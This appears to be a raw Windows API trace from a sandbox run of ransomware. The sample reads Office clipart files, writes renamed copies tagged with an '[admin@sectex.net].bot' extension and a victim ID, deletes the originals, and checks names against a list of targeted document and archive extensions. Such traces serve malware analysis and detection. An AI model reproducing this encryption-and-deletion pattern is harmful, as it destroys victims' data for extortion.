	[0141.847] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.847] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.847] SetEndOfFile (hFile=0x3a0) returned 1
	[0141.847] CloseHandle (hObject=0x3a0) returned 1
	[0141.847] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.847] SetEndOfFile (hFile=0x3ac) returned 1
	[0142.461] CloseHandle (hObject=0x3ac) returned 1
	[0142.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.462] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf")) returned 1
	[0142.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.462] lstrlenW (lpString=".doc") returned 4
	[0142.462] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.462] lstrlenW (lpString=".docx") returned 5
	[0142.462] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.462] lstrlenW (lpString=".pdf") returned 4
	[0142.462] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.462] lstrlenW (lpString=".xls") returned 4
	[0142.462] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.462] lstrlenW (lpString=".xlsx") returned 5
	[0142.462] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.462] lstrlenW (lpString=".ppt") returned 4
	[0142.462] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.462] lstrlenW (lpString=".zip") returned 4
	[0142.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.463] lstrlenW (lpString=".rar") returned 4
	[0142.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.463] lstrlenW (lpString=".bz2") returned 4
	[0142.463] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.463] lstrlenW (lpString=".7z") returned 3
	[0142.463] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.463] lstrlenW (lpString=".dbf") returned 4
	[0142.463] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.463] lstrlenW (lpString=".1cd") returned 4
	[0142.463] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.463] lstrlenW (lpString=".jpg") returned 4
	[0142.463] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.463] lstrlenW (lpString=".doc") returned 4
	[0142.463] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.463] lstrlenW (lpString=".docx") returned 5
	[0142.463] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.463] lstrlenW (lpString=".pdf") returned 4
	[0142.463] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.463] lstrlenW (lpString=".xls") returned 4
	[0142.463] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.463] lstrlenW (lpString=".xlsx") returned 5
	[0142.463] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.463] lstrlenW (lpString=".ppt") returned 4
	[0142.463] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.463] lstrlenW (lpString=".zip") returned 4
	[0142.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.463] lstrlenW (lpString=".rar") returned 4
	[0142.464] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.464] lstrlenW (lpString=".bz2") returned 4
	[0142.464] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.464] lstrlenW (lpString=".7z") returned 3
	[0142.464] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.464] lstrlenW (lpString=".dbf") returned 4
	[0142.464] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.464] lstrlenW (lpString=".1cd") returned 4
	[0142.464] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63
	[0142.464] lstrlenW (lpString=".jpg") returned 4
	[0142.464] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.464] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.464] lstrlenW (lpString="BL00390_.WMF") returned 12
	[0142.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0142.482] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=13102) returned 1
	[0142.482] CloseHandle (hObject=0x31c) returned 1
	[0142.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf")) returned 0x20
	[0142.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.516] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.516] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0142.516] GetLastError () returned 0x0
	[0142.516] ReadFile (in: hFile=0x3b8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x332e, lpOverlapped=0x0) returned 1
	[0142.545] WriteFile (in: hFile=0x3cc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3330, lpOverlapped=0x0) returned 1
	[0142.546] ReadFile (in: hFile=0x3b8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.546] WriteFile (in: hFile=0x3cc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.547] SetEndOfFile (hFile=0x3cc) returned 1
	[0142.547] CloseHandle (hObject=0x3cc) returned 1
	[0142.547] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.547] SetEndOfFile (hFile=0x3b8) returned 1
	[0142.553] CloseHandle (hObject=0x3b8) returned 1
	[0142.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.572] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf")) returned 1
	[0142.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.572] lstrlenW (lpString=".doc") returned 4
	[0142.572] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.572] lstrlenW (lpString=".docx") returned 5
	[0142.572] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.572] lstrlenW (lpString=".pdf") returned 4
	[0142.572] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.572] lstrlenW (lpString=".xls") returned 4
	[0142.572] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.572] lstrlenW (lpString=".xlsx") returned 5
	[0142.572] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.572] lstrlenW (lpString=".ppt") returned 4
	[0142.572] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.572] lstrlenW (lpString=".zip") returned 4
	[0142.573] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.573] lstrlenW (lpString=".rar") returned 4
	[0142.573] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.573] lstrlenW (lpString=".bz2") returned 4
	[0142.573] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.573] lstrlenW (lpString=".7z") returned 3
	[0142.573] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.573] lstrlenW (lpString=".dbf") returned 4
	[0142.573] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.573] lstrlenW (lpString=".1cd") returned 4
	[0142.573] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.573] lstrlenW (lpString=".jpg") returned 4
	[0142.573] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.573] lstrlenW (lpString=".doc") returned 4
	[0142.573] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.573] lstrlenW (lpString=".docx") returned 5
	[0142.573] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.573] lstrlenW (lpString=".pdf") returned 4
	[0142.573] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.573] lstrlenW (lpString=".xls") returned 4
	[0142.573] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.573] lstrlenW (lpString=".xlsx") returned 5
	[0142.573] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.573] lstrlenW (lpString=".ppt") returned 4
	[0142.573] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.573] lstrlenW (lpString=".zip") returned 4
	[0142.573] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.574] lstrlenW (lpString=".rar") returned 4
	[0142.574] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.574] lstrlenW (lpString=".bz2") returned 4
	[0142.574] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.574] lstrlenW (lpString=".7z") returned 3
	[0142.574] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.574] lstrlenW (lpString=".dbf") returned 4
	[0142.574] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.574] lstrlenW (lpString=".1cd") returned 4
	[0142.574] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63
	[0142.574] lstrlenW (lpString=".jpg") returned 4
	[0142.574] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.574] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.574] lstrlenW (lpString="BL00921_.WMF") returned 12
	[0142.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.591] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4408) returned 1
	[0142.591] CloseHandle (hObject=0x384) returned 1
	[0142.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf")) returned 0x20
	[0142.600] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.629] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.629] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0142.629] GetLastError () returned 0x0
	[0142.629] ReadFile (in: hFile=0x3c4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1138, lpOverlapped=0x0) returned 1
	[0142.637] WriteFile (in: hFile=0x398, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1140, lpOverlapped=0x0) returned 1
	[0142.639] ReadFile (in: hFile=0x3c4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.639] WriteFile (in: hFile=0x398, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.639] SetEndOfFile (hFile=0x398) returned 1
	[0142.647] CloseHandle (hObject=0x398) returned 1
	[0142.647] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.647] SetEndOfFile (hFile=0x3c4) returned 1
	[0142.649] CloseHandle (hObject=0x3c4) returned 1
	[0142.649] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.657] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf")) returned 1
	[0142.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.658] lstrlenW (lpString=".doc") returned 4
	[0142.658] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.658] lstrlenW (lpString=".docx") returned 5
	[0142.658] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.658] lstrlenW (lpString=".pdf") returned 4
	[0142.658] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.658] lstrlenW (lpString=".xls") returned 4
	[0142.658] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.658] lstrlenW (lpString=".xlsx") returned 5
	[0142.658] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.658] lstrlenW (lpString=".ppt") returned 4
	[0142.658] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.658] lstrlenW (lpString=".zip") returned 4
	[0142.658] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.658] lstrlenW (lpString=".rar") returned 4
	[0142.658] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.658] lstrlenW (lpString=".bz2") returned 4
	[0142.658] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.658] lstrlenW (lpString=".7z") returned 3
	[0142.658] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.658] lstrlenW (lpString=".dbf") returned 4
	[0142.658] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.658] lstrlenW (lpString=".1cd") returned 4
	[0142.658] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.658] lstrlenW (lpString=".jpg") returned 4
	[0142.658] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.659] lstrlenW (lpString=".doc") returned 4
	[0142.659] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.659] lstrlenW (lpString=".docx") returned 5
	[0142.659] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.659] lstrlenW (lpString=".pdf") returned 4
	[0142.659] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.659] lstrlenW (lpString=".xls") returned 4
	[0142.659] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.659] lstrlenW (lpString=".xlsx") returned 5
	[0142.659] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.659] lstrlenW (lpString=".ppt") returned 4
	[0142.659] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.659] lstrlenW (lpString=".zip") returned 4
	[0142.659] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.659] lstrlenW (lpString=".rar") returned 4
	[0142.659] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.659] lstrlenW (lpString=".bz2") returned 4
	[0142.659] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.659] lstrlenW (lpString=".7z") returned 3
	[0142.659] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.659] lstrlenW (lpString=".dbf") returned 4
	[0142.659] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.659] lstrlenW (lpString=".1cd") returned 4
	[0142.659] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63
	[0142.659] lstrlenW (lpString=".jpg") returned 4
	[0142.659] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.659] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.660] lstrlenW (lpString="BOATINST.WMF") returned 12
	[0142.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0142.660] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=29004) returned 1
	[0142.660] CloseHandle (hObject=0x3b4) returned 1
	[0142.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf")) returned 0x20
	[0142.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0142.660] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.661] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0142.662] GetLastError () returned 0x0
	[0142.662] ReadFile (in: hFile=0x3b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x714c, lpOverlapped=0x0) returned 1
	[0143.033] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x7150, lpOverlapped=0x0) returned 1
	[0143.034] ReadFile (in: hFile=0x3b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
